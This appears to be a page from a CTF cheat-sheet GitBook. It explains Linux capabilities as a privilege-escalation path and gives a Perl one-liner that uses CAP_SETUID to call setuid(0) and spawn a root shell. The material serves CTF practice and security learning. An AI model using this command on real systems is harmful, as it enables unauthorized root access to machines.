CTF All The Things
  • CTF All The Things
  • Useful Stuff
    • Bash-fu
    • Bash mkdir and cd
    • Upgrade Shell
    • Static Binaries
  • Discovery & Scanning
    • NMAP
    • Gobuster
    • SMB
    • SNMP
    • SQLMap
    • Hydra
    • Nikto
    • WPScan
    • Joomla
    • TCPDump
  • Gaining Access
    • Remote Desktop
    • Evil-WinRM
    • Reverse Shells
    • Web Shells
    • SSH Port Forwarding
  • Enumeration & Exploitation
    • Things To Check First
    • Enumeration Scripts
    • Capabilties
    • SUID Binaries
    • Active Services
    • Port Enumeration
    • Steganography
    • Cracking Hashes
  • Reversing
  • Exfiltration
    • Netcat Redirect
    • SSH/SCP
    • Bash wget
    • HTTP Server
  • Maintaining Access
  • Pencer CTF Blog
Powered by GitBook
On this page
Edit on GitHub
  1. Enumeration & Exploitation

Capabilties

Capabilities is a well known attack vector. GTFOBins has lots of really good information about the many UNIX/Linux binaries that can be abused.

Perl

This section talks about Perl and what you can do with CAP_SETUID being set.

If it's set:

/usr/bin/perl = cap_setuid+ep

Then do this:

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
PreviousEnumeration ScriptsNextSUID Binaries

Last updated 2 years ago